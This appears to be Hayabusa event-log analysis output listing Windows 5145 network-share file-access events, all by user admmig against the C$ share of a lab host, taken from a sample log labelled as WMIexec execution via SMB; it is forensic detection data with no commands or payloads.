2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 